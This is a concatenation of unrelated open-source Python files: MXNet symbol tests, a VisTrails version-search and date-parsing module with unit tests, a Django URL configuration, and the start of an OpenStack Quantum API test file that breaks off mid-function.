fc2 = mx.symbol.FullyConnected(data = act1, name = 'fc2', num_hidden = 64, lr_mult=0.01)
act2 = mx.symbol.Activation(data = fc2, name='relu2', act_type="relu")
fc3 = mx.symbol.FullyConnected(data = act2, name='fc3', num_hidden=10)
fc3 = mx.symbol.BatchNorm(fc3, name='batchnorm0')
sym1 = mx.symbol.SoftmaxOutput(data = fc3, name = 'softmax')
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sym2 = mx.sym.load(os.path.join(curr_path, 'save_000800.json'))
attr1 = sym1.attr_dict()
attr2 = sym2.attr_dict()
for k, v1 in attr1.items():
assert k in attr2, k
v2 = attr2[k]
for kk, vv1 in v1.items():
if kk.startswith('__') and kk.endswith('__'):
assert kk in v2 and v2[kk] == vv1, k + str(v1) + str(v2)
check_symbol_consistency(sym1, sym2,
{'ctx': mx.cpu(0), 'group2ctx': {'stage1' : mx.cpu(1), 'stage2' : mx.cpu(2)}, 'data': (1,200)})
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(2*a)
exe = b.simple_bind(ctx=mx.cpu(), a=(10,10))
def test_zero_prop():
data = mx.symbol.Variable('data')
for i in range(10):
data = data * data
exe = data.simple_bind(ctx=mx.cpu(), data=(10, 3, 256, 256))
big = int(re.search('Total (\d+) MB allocated', exe.debug_str()).group(1))
exe = data.simple_bind(ctx=mx.cpu(), data=(10, 3, 256, 256), grad_req='null')
small1 = int(re.search('Total (\d+) MB allocated', exe.debug_str()).group(1))
data = mx.sym.stop_gradient(data)
exe = data.simple_bind(ctx=mx.cpu(), data=(10, 3, 256, 256))
small2 = int(re.search('Total (\d+) MB allocated', exe.debug_str()).group(1))
assert big > small2
assert small1 == small2
def test_zero_prop2():
x = mx.sym.Variable('x')
idx = mx.sym.Variable('idx')
y = mx.sym.batch_take(x, idx)
z = mx.sym.stop_gradient(y)
exe = z.simple_bind(ctx=mx.cpu(), x=(10, 10), idx=(10,),
type_dict={'x': np.float32, 'idx': np.int32})
exe.forward()
exe.backward()
# The following bind() should throw an exception. We discard the expected stderr
# output for this operation only in order to keep the test logs clean.
with discard_stderr():
try:
y.simple_bind(ctx=mx.cpu(), x=(10, 10), idx=(10,),
type_dict={'x': np.float32, 'idx': np.int32})
except:
return
assert False
def test_simple_bind_incomplete_shape_inference_in_one_forward_pass():
"""This is a special case that results in shape inference
failure after moving simple_bind logic from frontend to backend.
Added here for testing against the network similar to the following one.
Network diagram:
weight --> abs_op --> sum_op --
\ |--> add_op
data --> fc_op --> sum_op --
Given data's shape, if the shape inference starts from weight node,
then the node entries of negative_op and sum_op are unknown in the
forward pass. Therefore, there are several unknown shapes after the
first forward pass is done. Now the backward inference pass starts with
the assumption that there are no unknown-shape node entries in the forward
pass, and consequently, leads to CHECK_EQ failure.
"""
data_shape = (5, 13)
data = mx.sym.Variable('data')
fc = mx.sym.FullyConnected(data=data, num_hidden=1, no_bias=True, name='fc')
modified_weight = mx.sym.abs(fc.get_internals()['fc_weight'])
net = mx.sym.sum(modified_weight) + mx.sym.sum(fc)
net.simple_bind(ctx=mx.cpu(), data=data_shape)
def test_simple_bind_gradient_graph_possible_with_cycle():
"""This is a special case that results in a cycle in the gradient graph
before this bug was fixed. With the following symbol, the node entries
passed into function AggregateGradient(std::vector<nnvm::NodeEntry>&& v)
are the outputs of the same node. Therefore, adding a node to the
control_deps of itself must be skipped.
See GitHub issue:
https://github.com/apache/incubator-mxnet/issues/8029
for more details."""
data = mx.symbol.Variable('data')
res = data + data + data + data + data + data + data + data
res.simple_bind(ctx=mx.cpu(), data=(1,))
if __name__ == '__main__':
import nose
nose.runmodule()
|
CMUSV-VisTrails/WorkflowRecommendation | refs/heads/master | vistrails/core/query/version.py | 1 | ###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
# We need to remove QtGui and QtCore refernce by storing all of our
# notes in plain text, not html, should be fix later
from core.query import extract_text
import core.utils
import re
import time
################################################################################
class SearchParseError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class SearchStmt(object):
def __init__(self, content):
self.text = content
self.content = re.compile('.*'+content+'.*', re.MULTILINE | re.IGNORECASE)
def match(self, vistrail, action):
return True
def matchModule(self, v, m):
return True
def run(self, v, n):
pass
def __call__(self):
"""Make SearchStmt behave just like a QueryObject."""
return self
class TimeSearchStmt(SearchStmt):
oneSecond = 1.0
oneMinute = oneSecond * 60.0
oneHour = oneMinute * 60.0
oneDay = oneHour * 24.0
oneWeek = oneDay * 7.0
oneMonth = oneDay * 31.0 # wrong, I know
oneYear = oneDay * 365.0 # wrong, I know
amounts = {'seconds': oneSecond,
'minutes': oneMinute,
'hours': oneHour,
'days': oneDay,
'weeks': oneWeek,
'months': oneMonth,
'years': oneYear}
months = {'january': 1,
'february': 2,
'march': 3,
'april': 4,
'may': 5,
'june': 6,
'july': 7,
'august': 8,
'september': 9,
'october': 10,
'november': 11,
'december': 12}
dateEntry = r'([^\,\/\: ]+)'
timeEntry = r'(\d?\d?)'
dateSep = r' *[\,\/\- ] *'
timeSep = r' *: *'
sep = r' *'
start = r'^ *'
finish = r' *$'
twoEntryDate = (dateEntry+
dateSep+
dateEntry)
threeEntryDate = (dateEntry+
dateSep+
dateEntry+
dateSep+
dateEntry)
twoEntryTime = (timeEntry+
timeSep+
timeEntry)
threeEntryTime = (timeEntry+
timeSep+
timeEntry+
timeSep+
timeEntry)
dateRE = [re.compile((start+
twoEntryDate+
finish)), # Mar 12 Mar, 12
re.compile((start+
threeEntryDate+
finish)), # Mar, 12, 2006 2006 Mar 12 etc
re.compile((start+
twoEntryTime+
finish)),
re.compile((start+
threeEntryTime+
finish)),
re.compile((start+
twoEntryDate+
sep+
twoEntryTime+
finish)),
re.compile((start+
twoEntryDate+
sep+
threeEntryTime+
finish)),
re.compile((start+
threeEntryDate+
sep+
twoEntryTime+
finish)),
re.compile((start+
threeEntryDate+
sep+
threeEntryTime+
finish)),
re.compile((start+
twoEntryTime+
sep+
twoEntryDate+
finish)),
re.compile((start+
twoEntryTime+
sep+
threeEntryDate+
finish)),
re.compile((start+
threeEntryTime+
sep+
twoEntryDate+
finish)),
re.compile((start+
threeEntryTime+
sep+
threeEntryDate+
finish))]
def __init__(self, date):
self.date = self.parseDate(date)
def parseDate(self, dateStr):
def parseAgo(s):
[amount, unit] = s.split(' ')
try:
amount = float(amount)
except ValueError:
raise SearchParseError("Expected a number, got %s" % amount)
if amount <= 0:
raise SearchParseError("Expected a positive number, got %s" % amount)
unitRe = re.compile('^'+unit)
keys = [k
for k in TimeSearchStmt.amounts.keys()
if unitRe.match(k)]
if len(keys) == 0:
raise SearchParseError("Time unit unknown: %s" % unit)
elif len(keys) > 1:
raise SearchParseError("Time unit ambiguous: %s matches %s" % (unit, keys))
return round(time.time()) - TimeSearchStmt.amounts[keys[0]] * amount
def guessDate(unknownEntries, year=None):
def guessStrMonth(s):
monthRe = re.compile('^'+s)
keys = [k
for k in TimeSearchStmt.months.keys()
if monthRe.match(k)]
if len(keys) == 0:
raise SearchParseError("Unknown month: %s" % s)
elif len(keys) > 1:
raise SearchParseError("Ambiguous month: %s matches %s" % (s, keys))
return TimeSearchStmt.months[keys[0]]
if not year:
m = None
# First heuristic: if month comes first, then year comes last
try:
e0 = int(unknownEntries[0])
except ValueError:
m = guessStrMonth(unknownEntries[0])
try:
d = int(unknownEntries[1])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[1])
try:
y = int(unknownEntries[2])
except ValueError:
raise SearchParseError("Expected year, got %s" % unknownEntries[2])
return (y, m, d)
# Second heuristic: if month comes last, then year comes first
try:
e2 = int(unknownEntries[2])
except ValueError:
m = guessStrMonth(unknownEntries[2])
try:
d = int(unknownEntries[1])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[1])
try:
y = int(unknownEntries[0])
except ValueError:
raise SearchParseError("Expected year, got %s" % unknownEntries[0])
return (y, m, d)
# If month is the middle one, decide day and year by size
# (year is largest, hopefully year was entered using 4 digits)
try:
e1 = int(unknownEntries[1])
except ValueError:
m = guessStrMonth(unknownEntries[1])
try:
d = int(unknownEntries[2])
except ValueError:
raise SearchParseError("Expected day or year, got %s" % unknownEntries[2])
try:
y = int(unknownEntries[0])
except ValueError:
raise SearchParseError("Expected year or year, got %s" % unknownEntries[0])
return (max(y,d), m, min(y, d))
lst = [(e0,0),(e1,1),(e2,2)]
lst.sort()
return guessDate([str(lst[0][0]),
str(lst[1][0])],
year=e2)
# We know year, decide month using similar heuristics - try string month first,
# then decide which is possible
try:
e0 = int(unknownEntries[0])
except ValueError:
m = guessStrMonth(unknownEntries[0])
try:
d = int(unknownEntries[1])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[1])
return (year, m, d)
try:
e1 = int(unknownEntries[1])
except ValueError:
m = guessStrMonth(unknownEntries[1])
try:
d = int(unknownEntries[0])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[0])
return (year, m, d)
if e0 > 12:
return (year, e1, e0)
else:
return (year, e0, e1)
dateStr = dateStr.lower().lstrip().rstrip()
if dateStr.endswith(" ago"):
return parseAgo(dateStr[:-4])
if dateStr == "yesterday":
lst = list(time.localtime(round(time.time()) - TimeSearchStmt.oneDay))
# Reset hour, minute, second
lst[3] = 0
lst[4] = 0
lst[5] = 0
return time.mktime(lst)
if dateStr == "today":
lst = list(time.localtime())
# Reset hour, minute, second
lst[3] = 0
lst[4] = 0
lst[5] = 0
return time.mktime(lst)
if dateStr.startswith("this "):
rest = dateStr[5:]
lst = list(time.localtime(round(time.time())))
if rest == "minute":
lst[5] = 0
elif rest == "hour":
lst[5] = 0
lst[4] = 0
elif rest == "day":
lst[5] = 0
lst[4] = 0
lst[3] = 0
elif rest == "week": # weeks start on monday
lst[5] = 0
lst[4] = 0
lst[3] = 0
# This hack saves me the hassle of computing negative days, months, etc
lst = list(time.localtime(time.mktime(lst) - TimeSearchStmt.oneDay * lst[6]))
elif rest == "month":
lst[5] = 0
lst[4] = 0
lst[3] = 0
lst[2] = 1
elif rest == "year":
lst[5] = 0
lst[4] = 0
lst[3] = 0
lst[2] = 1
lst[1] = 1
return time.mktime(lst)
result = [x.match(dateStr) for x in TimeSearchStmt.dateRE]
this = list(time.localtime())
def setTwoDate(g):
d = guessDate(g, year=this[0])
this[0] = d[0]
this[1] = d[1]
this[2] = d[2]
def setThreeDate(g):
d = guessDate(g)
this[0] = d[0]
this[1] = d[1]
this[2] = d[2]
def setTwoTime(g):
this[3] = int(g[0])
this[4] = int(g[1])
this[5] = 0
def setThreeTime(g):
this[3] = int(g[0])
this[4] = int(g[1])
this[5] = int(g[2])
if result[0]:
setTwoDate(result[0].groups())
setTwoTime([0,0])
elif result[1]:
setThreeDate(result[1].groups())
setTwoTime([0,0])
elif result[2]:
setTwoTime(result[2].groups())
elif result[3]:
setThreeTime(result[3].groups())
elif result[4]:
g = result[4].groups()
setTwoDate([g[0], g[1]])
setTwoTime([g[2], g[3]])
elif result[5]:
g = result[5].groups()
setTwoDate([g[0], g[1]])
setThreeTime([g[2], g[3], g[4]])
elif result[6]:
g = result[6].groups()
setThreeDate([g[0], g[1], g[2]])
setTwoTime([g[3], g[4]])
elif result[7]:
g = result[7].groups()
setThreeDate([g[0], g[1], g[2]])
setThreeTime([g[3], g[4], g[5]])
elif result[8]:
g = result[8].groups()
setTwoTime([g[0], g[1]])
setTwoDate([g[2], g[3]])
elif result[9]:
g = result[9].groups()
setTwoTime([g[0], g[1]])
setThreeDate([g[2], g[3], g[4]])
elif result[10]:
g = result[10].groups()
setThreeTime([g[0], g[1], g[2]])
setTwoDate([g[3], g[4]])
elif result[11]:
g = result[11].groups()
setThreeTime([g[0], g[1], g[2]])
setThreeDate([g[3], g[4],g[5]])
else:
raise SearchParseError("Expected a date, got '%s'" % dateStr)
return time.mktime(this)
class BeforeSearchStmt(TimeSearchStmt):
def match(self, vistrail, action):
if not action.date:
return False
t = time.mktime(time.strptime(action.date, "%d %b %Y %H:%M:%S"))
return t <= self.date
class AfterSearchStmt(TimeSearchStmt):
def match(self, vistrail, action):
if not action.date:
return False
t = time.mktime(time.strptime(action.date, "%d %b %Y %H:%M:%S"))
return t >= self.date
class UserSearchStmt(SearchStmt):
def match(self, vistrail, action):
if not action.user:
return False
return self.content.match(action.user)
class NotesSearchStmt(SearchStmt):
def match(self, vistrail, action):
if vistrail.has_notes(action.id):
plainNotes = extract_text(vistrail.get_notes(action.id))
return self.content.search(plainNotes)
return False
class NameSearchStmt(SearchStmt):
def match(self, vistrail, action):
m = 0
tm = vistrail.get_tagMap()
if action.timestep in tm:
m = self.content.match(tm[action.timestep])
if bool(m) == False:
m = self.content.match(vistrail.get_description(action.timestep))
return bool(m)
class ModuleSearchStmt(SearchStmt):
def match(self, vistrail, action):
pipeline = vistrail.getPipeline(action.timestep)
for module in pipeline.modules.itervalues():
if self.content.match(module.name):
return True
return False
class AndSearchStmt(SearchStmt):
def __init__(self, lst):
self.matchList = lst
def match(self, vistrail, action):
for s in self.matchList:
if not s.match(vistrail, action):
return False
return True
class OrSearchStmt(SearchStmt):
def __init__(self, lst):
self.matchList = lst
def match(self, vistrail, action):
for s in self.matchList:
if s.match(vistrail, action):
return True
return False
class NotSearchStmt(SearchStmt):
def __init__(self, stmt):
self.stmt = stmt
def match(self, vistrail, action):
return not self.stmt.match(action)
class TrueSearch(SearchStmt):
def __init__(self):
pass
def match(self, vistrail, action):
return True
################################################################################
class SearchCompiler(object):
SEPARATOR = -1
def __init__(self, searchStr):
self.searchStmt = self.compile(searchStr)
def compile(self, searchStr):
lst = []
t1 = searchStr.split(' ')
while t1:
tok = t1[0]
cmd = tok.split(':')
if not SearchCompiler.dispatch.has_key(cmd[0]):
fun = SearchCompiler.parseAny
else:
fun = SearchCompiler.dispatch[cmd[0]]
if len(cmd) > 1:
[search, rest] = fun(self, cmd[1:] + t1[1:])
else:
[search, rest] = fun(self, t1)
lst.append(search)
t1 = rest
return AndSearchStmt(lst)
def parseUser(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
return (UserSearchStmt(tokStream[0]), tokStream[1:])
def parseAny(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
tok = tokStream[0]
return (OrSearchStmt([UserSearchStmt(tok),
NotesSearchStmt(tok),
NameSearchStmt(tok)]), tokStream[1:])
def parseNotes(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
if ':' in tok:
return (AndSearchStmt(lst), tokStream)
lst.append(NotesSearchStmt(tok))
tokStream = tokStream[1:]
return (AndSearchStmt(lst), [])
def parseName(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
if ':' in tok:
return (AndSearchStmt(lst), tokStream)
lst.append(NameSearchStmt(tok))
tokStream = tokStream[1:]
return (AndSearchStmt(lst), [])
def parseModule(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
if ':' in tok:
return (AndSearchStmt(lst), tokStream)
lst.append(ModuleSearchStmt(tok))
tokStream = tokStream[1:]
return (AndSearchStmt(lst), [])
def parseBefore(self, tokStream):
old_tokstream = tokStream
try:
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
# ugly, special case times
if (':' in tok and
not TimeSearchStmt.dateRE[2].match(tok) and
not TimeSearchStmt.dateRE[3].match(tok)):
return (BeforeSearchStmt(" ".join(lst)), tokStream)
lst.append(tok)
tokStream = tokStream[1:]
return (BeforeSearchStmt(" ".join(lst)), [])
except SearchParseError, e:
if 'Expected a date' in e.args[0]:
try:
return self.parseAny(old_tokstream)
except SearchParseError, e2:
print "Another exception...", e2.args[0]
raise e
else:
raise
def parseAfter(self, tokStream):
try:
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
# ugly, special case times
if (':' in tok and
not TimeSearchStmt.dateRE[2].match(tok) and
not TimeSearchStmt.dateRE[3].match(tok)):
return (AfterSearchStmt(" ".join(lst)), tokStream)
lst.append(tok)
tokStream = tokStream[1:]
return (AfterSearchStmt(" ".join(lst)), [])
except SearchParseError, e:
if 'Expected a date' in e.args[0]:
try:
return self.parseAny(['after'] + tokStream)
except SearchParseError, e2:
print "Another exception...", e2.args[0]
raise e
else:
raise
dispatch = {'user': parseUser,
'notes': parseNotes,
'before': parseBefore,
'after': parseAfter,
'name': parseName,
'module': parseModule,
'any': parseAny}
################################################################################
import unittest
import datetime
class TestSearch(unittest.TestCase):
def test1(self):
self.assertEquals((TimeSearchStmt('1 day ago').date -
TimeSearchStmt('2 days ago').date), TimeSearchStmt.oneDay)
def test2(self):
self.assertEquals((TimeSearchStmt('12 mar 2006').date -
TimeSearchStmt('11 mar 2006').date), TimeSearchStmt.oneDay)
def test3(self):
# This will fail if year flips during execution. Oh well :)
yr = datetime.datetime.today().year
self.assertEquals((TimeSearchStmt('12 mar').date -
TimeSearchStmt('12 mar %d' % yr).date), 0.0)
def test4(self):
# This will fail if year flips during execution. Oh well :)
yr = datetime.datetime.today().year
self.assertEquals((TimeSearchStmt('mar 12').date -
TimeSearchStmt('12 mar %d' % yr).date), 0.0)
def test5(self):
yr = datetime.datetime.today().year
self.assertEquals((TimeSearchStmt('03 15').date -
TimeSearchStmt('15 mar %d' % yr).date), 0.0)
def test6(self):
self.assertEquals((TimeSearchStmt('03/15/2006').date -
TimeSearchStmt('15 mar 2006').date), 0.0)
def test7(self):
self.assertEquals((TimeSearchStmt('1 day ago').date -
TimeSearchStmt('24 hours ago').date), 0.0)
def test8(self):
self.assertEquals((TimeSearchStmt('1 hour ago').date -
TimeSearchStmt('60 minutes ago').date), 0.0)
def test9(self):
self.assertEquals((TimeSearchStmt('1 minute ago').date -
TimeSearchStmt('60 seconds ago').date), 0.0)
def test10(self):
self.assertEquals((TimeSearchStmt('1 week ago').date -
TimeSearchStmt('7 days ago').date), 0.0)
def test11(self):
self.assertEquals((TimeSearchStmt('1 month ago').date -
TimeSearchStmt('31 days ago').date), 0.0)
def test12(self):
self.assertEquals(TimeSearchStmt('12 mar 2007 21:00:00').date,
TimeSearchStmt('21:00:00 12 mar 2007').date)
def test13(self):
# This will fail if year flips during execution. Oh well :)
yr = datetime.datetime.today().year
self.assertEquals(TimeSearchStmt('12 mar %d 21:00' % yr).date,
TimeSearchStmt('21:00:00 12 mar').date)
def test14(self):
self.assertEquals(TimeSearchStmt('13 apr 2006 21:00').date,
TimeSearchStmt('04/13/2006 21:00:00').date)
def test15(self):
import core.vistrail
from core.db.locator import XMLFileLocator
import core.system
v = XMLFileLocator(core.system.vistrails_root_directory() +
'/tests/resources/dummy.xml').load()
# FIXME: Add notes to this.
# self.assertTrue(NotesSearchStmt('mapper').match(v.actionMap[36]))
# self.assertFalse(NotesSearchStmt('-qt-block-indent').match(v.actionMap[36]))
# test16 and 17 now pass.
# def test16(self):
# self.assertRaises(SearchParseError, lambda *args: SearchCompiler('before:'))
# def test17(self):
# self.assertRaises(SearchParseError, lambda *args: SearchCompiler('after:yesterday before:lalala'))
def test18(self):
self.assertEquals(TimeSearchStmt(' 13 apr 2006 ').date,
TimeSearchStmt(' 13 apr 2006 ').date)
def test19(self):
self.assertEquals(SearchCompiler('before:13 apr 2006 12:34:56').searchStmt.matchList[0].date,
BeforeSearchStmt('13 apr 2006 12:34:56').date)
def test20(self):
self.assertEquals(SearchCompiler('after:yesterday').searchStmt.matchList[0].date,
SearchCompiler('before:yesterday').searchStmt.matchList[0].date)
def test21(self):
self.assertEquals(SearchCompiler('after:today').searchStmt.matchList[0].date,
SearchCompiler('before:today').searchStmt.matchList[0].date)
def test22(self):
self.assertEquals(SearchCompiler('before:today').searchStmt.matchList[0].date,
SearchCompiler('before:this day').searchStmt.matchList[0].date)
def test23(self):
t = time.localtime()
import core.utils
inv = core.utils.invert(TimeSearchStmt.months)
m = inv[t[1]]
self.assertEquals(SearchCompiler('after:%s %s %s' % (t[0], m, t[2])).searchStmt.matchList[0].date,
SearchCompiler('after:today').searchStmt.matchList[0].date)
def test24(self):
# Test compiling these searches
SearchCompiler('before')
SearchCompiler('after')
if __name__ == '__main__':
unittest.main()
|
DenysGurin/projt1 | refs/heads/master | projt1/urls.py | 1 | """projt1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^', include('authorization.urls')),
url(r'^polls/', include('polls.urls')),
url(r'^data/', include('data.urls')),
url(r'^admin/', admin.site.urls),
url(r'^oauth/', include('social_django.urls', namespace='social')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
xchenum/quantum | refs/heads/master | quantum/tests/unit/_test_api.py | 3 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 ????
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Brad Hall, Nicira Networks
# @author: Salvatore Orlando, Citrix Systems
import logging
import unittest2 as unittest
import mock
import os
from quantum.api.api_common import APIFaultWrapper
from quantum.api.networks import Controller
from quantum.common import config
from quantum.common.test_lib import test_config
from quantum.db import api as db
from quantum.openstack.common import cfg
from quantum.openstack.common import importutils
import quantum.tests.unit.testlib_api as testlib
from quantum.wsgi import XMLDeserializer, JSONDeserializer
LOG = logging.getLogger('quantum.tests.test_api')
ROOTDIR = os.path.dirname(os.path.dirname(__file__))
ETCDIR = os.path.join(ROOTDIR, 'etc')
def etcdir(*p):
return os.path.join(ETCDIR, *p)
NETS = "networks"
PORTS = "ports"
ATTS = "attachments"
class AbstractAPITest(unittest.TestCase):
""" Base class definiting some methods for API tests """
def _deserialize_net_response(self, content_type, response):
network_data = (self._net_deserializers[content_type].
deserialize(response.body)['body'])
# do not taint assertions with xml namespace
if 'xmlns' in network_data['network']:
del network_data['network']['xmlns']
return network_data
def _deserialize_port_response(self, content_type, response):
port_data = (self._port_deserializers[content_type].
deserialize(response.body)['body'])
# do not taint assertions with xml namespace
if 'xmlns' in port_data['port']:
del port_data['port']['xmlns']
return port_data
def _create_network(self, fmt, name=None, custom_req_body=None,
expected_res_status=None):
LOG.debug("Creating network")
content_type = "application/" + fmt
if name:
net_name = name
else:
net_name = self.network_name
network_req = testlib.new_network_request(self.tenant_id,
net_name, fmt,
custom_req_body)
network_res = network_req.get_response(self.api)
expected_res_status = (expected_res_status or
self._successful_create_code)
self.assertEqual(network_res.status_int, expected_res_status)
if expected_res_status in (200, 202):
network_data = self._deserialize_net_response(content_type,
network_res)
return network_data['network']['id']
def _create_port(self, network_id, port_state, fmt, custom_req_body=None,
expected_res_status=None):
LOG.debug("Creating port for network %s", network_id)
content_type = "application/%s" % fmt
port_req = testlib.new_port_request(self.tenant_id, network_id,
port_state, fmt,
custom_req_body)
port_res = port_req.get_response(self.api)
expected_res_status = (expected_res_status or
self._successful_create_code)
self.assertEqual(port_res.status_int, expected_res_status)
if expected_res_status in (200, 202):
port_data = self._deserialize_port_response(content_type,
port_res)
return port_data['port']['id']
def _set_attachment(self, network_id, port_id, interface_id, fmt,
expected_res_status=204):
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, expected_res_status)
def setUp(self, api_router_klass, xml_metadata_dict):
# Create the default configurations
args = ['--config-file', etcdir('quantum.conf.test')]
config.parse(args=args)
# Update the plugin
cfg.CONF.set_override('core_plugin', test_config['plugin_name'])
api_router_cls = importutils.import_class(api_router_klass)
self.api = api_router_cls()
self.tenant_id = "test_tenant"
self.network_name = "test_network"
# Prepare XML & JSON deserializers
net_xml_deserializer = XMLDeserializer(xml_metadata_dict[NETS])
port_xml_deserializer = XMLDeserializer(xml_metadata_dict[PORTS])
att_xml_deserializer = XMLDeserializer(xml_metadata_dict[ATTS])
json_deserializer = JSONDeserializer()
self._net_deserializers = {
'application/xml': net_xml_deserializer,
'application/json': json_deserializer,
}
self._port_deserializers = {
'application/xml': port_xml_deserializer,
'application/json': json_deserializer,
}
self._att_deserializers = {
'application/xml': att_xml_deserializer,
'application/json': json_deserializer,
}
def tearDown(self):
"""Clear the test environment"""
# Remove database contents
db.clear_db()
cfg.CONF.reset()
class BaseAPIOperationsTest(AbstractAPITest):
"""Abstract base class for Quantum API unit tests
Defined according to operations defined for Quantum API v1.0
"""
def _test_create_network(self, fmt):
LOG.debug("_test_create_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
show_network_req = testlib.show_network_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = (self._net_deserializers[content_type].
deserialize(show_network_res.body)['body'])
self.assertEqual(network_id, network_data['network']['id'])
LOG.debug("_test_create_network - fmt:%s - END", fmt)
def _test_create_network_badrequest(self, fmt):
LOG.debug("_test_create_network_badrequest - fmt:%s - START", fmt)
bad_body = {'network': {'bad-attribute': 'very-bad'}}
self._create_network(fmt, custom_req_body=bad_body,
expected_res_status=400)
LOG.debug("_test_create_network_badrequest - fmt:%s - END", fmt)
def _test_list_networks(self, fmt):
LOG.debug("_test_list_networks - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
self._create_network(fmt, "net_1")
self._create_network(fmt, "net_2")
list_network_req = testlib.network_list_request(self.tenant_id,
fmt)
list_network_res = list_network_req.get_response(self.api)
self.assertEqual(list_network_res.status_int, 200)
network_data = (self._net_deserializers[content_type].
deserialize(list_network_res.body)['body'])
# Check network count: should return 2
self.assertEqual(len(network_data['networks']), 2)
LOG.debug("_test_list_networks - fmt:%s - END", fmt)
def _test_list_networks_detail(self, fmt):
LOG.debug("_test_list_networks_detail - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
self._create_network(fmt, "net_1")
self._create_network(fmt, "net_2")
list_network_req = testlib.network_list_detail_request(self.tenant_id,
fmt)
list_network_res = list_network_req.get_response(self.api)
self.assertEqual(list_network_res.status_int, 200)
network_data = (self._net_deserializers[content_type].
deserialize(list_network_res.body)['body'])
# Check network count: should return 2
self.assertEqual(len(network_data['networks']), 2)
# Check contents - id & name for each network
for network in network_data['networks']:
self.assertTrue('id' in network and 'name' in network)
self.assertTrue(network['id'] and network['name'])
LOG.debug("_test_list_networks_detail - fmt:%s - END", fmt)
def _test_show_network(self, fmt):
LOG.debug("_test_show_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
show_network_req = testlib.show_network_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = self._deserialize_net_response(content_type,
show_network_res)
self.assert_network(id=network_id, name=self.network_name,
network_data=network_data['network'])
LOG.debug("_test_show_network - fmt:%s - END", fmt)
def _test_show_network_detail(self, fmt):
LOG.debug("_test_show_network_detail - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
# Create a network and a port
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, "ACTIVE", fmt)
